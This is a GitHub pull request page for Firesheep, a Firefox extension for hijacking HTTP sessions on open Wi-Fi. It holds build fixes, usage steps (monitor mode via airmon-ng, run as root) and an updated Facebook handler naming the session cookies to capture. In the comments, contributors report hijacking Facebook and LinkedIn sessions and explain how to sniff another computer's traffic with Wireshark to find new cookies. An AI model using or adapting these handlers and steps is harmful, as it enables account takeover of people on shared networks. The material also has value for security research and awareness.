Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

Linux, documentation, firefox 8-10 and facebook handler fixes #160

Closed
wants to merge 9 commits into from

4 participants

Olivier Bilodeau Eric Butler Lorenzo Pistone Francesco Piccinno
Olivier Bilodeau

Merged pull request making HAL optional (#149) which fixes Linux problems. Then several small changes mostly documentation.

nopper and others added some commits
Francesco Piccinno nopper Updating .gitmodules file e939ac0
Francesco Piccinno nopper Fix to make hal dependency optional 23f8180
Olivier Bilodeau obilodeau Merge remote-tracking branch 'nopper/firefox5'
Conflicts:
	.gitmodules
997c29d
Olivier Bilodeau obilodeau updated documentation
- build instructions for ubuntu 11.04 and Backtrack 5
- noted that it works on Open SSIDs only
- usage notes for linux: interface in monitor mode required and run as root
da677e6
Olivier Bilodeau obilodeau ignoring linux build's temp files 8d21b5b
Olivier Bilodeau obilodeau Firefox 8 support
Tested with Firefox 8 on Ubuntu 11.10 and it worked just fine (as root).
d2df2b3
Olivier Bilodeau obilodeau fixed facebook handler 25e47fe
Olivier Bilodeau obilodeau documentation update regarding firefox as root
clarified that we must run under a real root user and not sudo otherwise firefox profile will corrupt
5d85d13
Olivier Bilodeau obilodeau Add-on compatiblity bumped to Firefox 10
Successfully tested and working on 9.x and 10.x on Ubuntu 11.10
0be55a7
Olivier Bilodeau

Just re-tested the whole thing and it works great under FF10 on Ubuntu 11.10 catching facebook and linkedin.

Lorenzo Pistone

this doesn't seem to work, even though I can see that a parameter named 'xs' is effectively sent in the HTTP GET request nowadays. Any idea?

I know it doesn't work for mobile or touch facebook. For normal facebook it worked at the time but maybe facebook changed again...

Have you tried another handler to make sure you are setup correctly? If so, then the best way to fix this is to open wireshark and start firefox in a console, have another computer browse facebook and try to find the new cookie. You can modify handlers directly into firesheep.

Good luck

I have just tested. I can capture flickr, but not facebook (it does not even show up in the list). Wireshark shows these cookies: datr, lu, local, c_user, xs, act, presence, p. The domain is rightly www.facebook.com. If you have a cooked solution I'd be happy, otherwise I'm going to fiddle with the script when I have a bit of time.

Eric Butler
Owner

Please submit separate pull requests for any handler updates and use #149 to discuss the HAL issue. Thanks.

Eric Butler codebutler closed this
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Sep 24, 2011
  1. Francesco Piccinno

    Updating .gitmodules file

    nopper authored
  2. Francesco Piccinno
Commits on Dec 24, 2011
  1. Olivier Bilodeau

    Merge remote-tracking branch 'nopper/firefox5'

    obilodeau authored
    Conflicts:
    	.gitmodules
Commits on Dec 26, 2011
  1. Olivier Bilodeau

    updated documentation

    obilodeau authored
    - build instructions for ubuntu 11.04 and Backtrack 5
    - noted that it works on Open SSIDs only
    - usage notes for linux: interface in monitor mode required and run as root
  2. Olivier Bilodeau
  3. Olivier Bilodeau

    Firefox 8 support

    obilodeau authored
    Tested with Firefox 8 on Ubuntu 11.10 and it worked just fine (as root).
  4. Olivier Bilodeau

    fixed facebook handler

    obilodeau authored
Commits on Feb 7, 2012
  1. Olivier Bilodeau

    documentation update regarding firefox as root

    obilodeau authored
    clarified that we must run under a real root user and not sudo otherwise firefox profile will corrupt
  2. Olivier Bilodeau

    Add-on compatiblity bumped to Firefox 10

    obilodeau authored
    Successfully tested and working on 9.x and 10.x on Ubuntu 11.10
This page is out of date. Refresh to see the latest.
11 .gitignore
View
@@ -29,3 +29,14 @@ build/
*.user
*.swp
*~
+
+# Linux build temporary files
+depcomp
+libtool
+libtool.m4
+ltmain.sh
+ltoptions.m4
+ltsugar.m4
+ltversion.m4
+lt~obsolete.m4
+
37 README.md
View
@@ -2,7 +2,9 @@
### **THIS BRANCH IS A WORK-IN-PROGRESS! Use the 'stable' branch (requires Firefox 3.x) instead!**
-A Firefox extension that demonstrates HTTP session hijacking attacks.
+A Firefox extension that demonstrates HTTP session hijacking attacks on Open (unencrypted) SSIDs.
+
+Extension will install on Firefox 6 to 10.
Created by:
@@ -34,6 +36,20 @@ See instructions for your platform below. When done, an xpi will be created insi
1. Install build dependencies (`sudo apt-get install autoconf libtool libpcap-dev libboost-all-dev libhal-dev`).
2. Run `./autogen.sh` then `make`.
+### Ubuntu Linux (11.10 Oneiric)
+
+1. Install build dependencies (`sudo apt-get install autoconf libtool libpcap-dev libboost-all-dev`).
+2. Run `./autogen.sh` then `make`.
+
+### Backtrack Linux 5 R1
+
+There is a build issue with libpcap-dev's version in BT5R1. See ticket [#157][7].
+
+1. Install build dependencies (`sudo apt-get install autoconf libtool libpcap-dev libboost-all-dev`).
+2. Run `./autogen.sh`
+3. Run `sed -i 's|L /usr/lib|L/usr/lib|g' config.status Makefile backend/Makefile` ([#157][7]'s workaround)
+4. Run `make`
+
### Windows
This has so far only been tested on Windows XP (32-bit), however the binaries work fine on Windows 7 too. If you can help simplify this process please let me know.
@@ -44,8 +60,27 @@ This has so far only been tested on Windows XP (32-bit), however the binaries wo
4. Install [WinPcap][6].
5. From a Cygwin command prompt: Run `./autogen.sh`) then run `make`!
+## Usage notes
+
+### Linux
+
+1. You must select an interface in monitor mode to perform the attack. To do so if your card support it and you have aircrack-ng installed you do:
+
+ airmon-ng start <interface>
+
+2. Run firefox as root:
+
+ $ sudo su -
+ # firefox
+
+ Then select the mon0 interface.
+
+ WARNING: Do not run firefox with sudo (`sudo firefox`) as it will [corrupt your firefox profile][8].
+
[1]: http://mxcl.github.com/homebrew/
[3]: http://www.cygwin.com/
[4]: http://www.boostpro.com/download/
[5]: http://en.wikipedia.org/wiki/Promiscuous_mode
[6]: http://www.winpcap.org/install/default.htm
+[7]: https://github.com/codebutler/firesheep/issues/157
+[8]: http://ubuntuforums.org/showthread.php?t=952579
43 backend/src/linux_platform.cpp
View
@@ -26,7 +26,10 @@
#include <cstdio>
#include <pcap/pcap.h>
#include "linux_platform.hpp"
+
+#ifndef DISABLE_HAL
#include <libhal.h>
+#endif
using namespace std;
using namespace boost;
@@ -43,6 +46,7 @@ bool LinuxPlatform::run_privileged()
return (ret == 0);
}
+#ifndef DISABLE_HAL
string device_get_property_string(LibHalContext *context, string device, string key, DBusError *error)
{
char *buf = libhal_device_get_property_string(context, device.c_str(), key.c_str(), error);
@@ -65,11 +69,14 @@ string device_get_property_string(LibHalContext *context, string device, string
return property;
}
+#endif
vector<InterfaceInfo> LinuxPlatform::interfaces()
{
vector<InterfaceInfo> result;
-
+
+#ifndef DISABLE_HAL
+
DBusError error;
LibHalContext *context;
char **devices;
@@ -79,7 +86,7 @@ vector<InterfaceInfo> LinuxPlatform::interfaces()
context = libhal_ctx_new();
if (context == NULL)
throw runtime_error("libhal_ctx_new() failed");
-
+
/* Initialize DBus connection */
dbus_error_init(&error);
if (!libhal_ctx_set_dbus_connection(context, dbus_bus_get(DBUS_BUS_SYSTEM, &error))) {
@@ -87,7 +94,7 @@ vector<InterfaceInfo> LinuxPlatform::interfaces()
LIBHAL_FREE_DBUS_ERROR(&error);
throw ex;
}
-
+
/* Initialize HAL context */
if (!libhal_ctx_init(context, &error)) {
if (dbus_error_is_set(&error)) {
@@ -106,7 +113,7 @@ vector<InterfaceInfo> LinuxPlatform::interfaces()
for (int i = 0; i < num_devices; i++) {
char *device = devices[i];
-
+
/* Get basic device information */
string iface = device_get_property_string(context, devices[i], "net.interface", &error);
string category = device_get_property_string(context, devices[i], "info.category", &error);
@@ -120,7 +127,7 @@ vector<InterfaceInfo> LinuxPlatform::interfaces()
type = "ethernet";
else
continue;
-
+
/* device points to a 'network inteface', get parent (physical?) device */
string parent = device_get_property_string(context, device, "net.originating_device", &error);
@@ -138,14 +145,34 @@ vector<InterfaceInfo> LinuxPlatform::interfaces()
string vendor = device_get_property_string(context, parent, "info.vendor", &error);
string product = device_get_property_string(context, parent, "info.product", &error);
string description(str(format("%s %s") % vendor % product));
-
+
InterfaceInfo info(iface, description, type);
result.push_back(info);
}
-
+
/* Free devices */
libhal_free_string_array(devices);
+#else
+ pcap_if_t *alldevs;
+ pcap_if_t *d;
+ char errbuf[PCAP_ERRBUF_SIZE+1];
+
+ if (pcap_findalldevs(&alldevs, errbuf) == -1) {
+ throw runtime_error(str(boost::format("Error in pcap_findalldevs: %s") % errbuf));
+ }
+
+ for (d = alldevs; d; d = d->next) {
+ string id(d->name);
+ boost::replace_all(id, "\\", "\\\\");
+ boost::replace_all(id, "{", "\\{");
+ boost::replace_all(id, "}", "\\}");
+ InterfaceInfo info(id, (string(d->description ? d->description : "No description")), "ethernet");
+ result.push_back(info);
+ }
+
+ pcap_freealldevs(alldevs);
+#endif
- return result;
+ return result;
}
12 configure.ac
View
@@ -100,9 +100,19 @@ AC_SUBST(BOOST_STRING_ALGO_LIBS)
# END BOOST LIBS
if test x$FIRESHEEP_PLATFORM_NAME = xLINUX; then
- PKG_CHECK_MODULES(HAL, [hal])
+ AC_MSG_CHECKING(if --enable-hal option is specified)
+ AC_ARG_ENABLE(hal, [ --enable-hal enable HAL interface listing])
+
+ if test "$enable_hal" = "yes"; then
+ PKG_CHECK_MODULES(HAL, [hal])
+ else
+ HAL_CFLAGS="-DDISABLE_HAL"
+ HAL_LIBS=""
+ fi
+
AC_SUBST(HAL_CFLAGS)
AC_SUBST(HAL_LIBS)
+ AC_MSG_RESULT(${enable_hal-no})
fi
CXXFLAGS="-Wall -g -O0"
4 xpi/handlers/facebook.js
View
@@ -5,11 +5,11 @@ register({
name: 'Facebook',
url: 'https://www.facebook.com/home.php',
domains: [ 'facebook.com' ],
- sessionCookieNames: [ 'datr', 'c_user', 'lu', 'sct' ],
+ sessionCookieNames: [ 'datr', 'c_user', 'lu', 'xs' ],
processPacket: function () {
var cookies = this.firstPacket.cookies;
- this.sessionId = cookies.c_user + cookies.sct;
+ this.sessionId = cookies.c_user + cookies.xs;
},
identifyUser: function () {
2  xpi/install.rdf
View
@@ -23,7 +23,7 @@
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id> <!-- Firefox -->
<em:minVersion>6.0</em:minVersion>
- <em:maxVersion>7.0.*</em:maxVersion>
+ <em:maxVersion>10.0.*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
Something went wrong with that request. Please try again.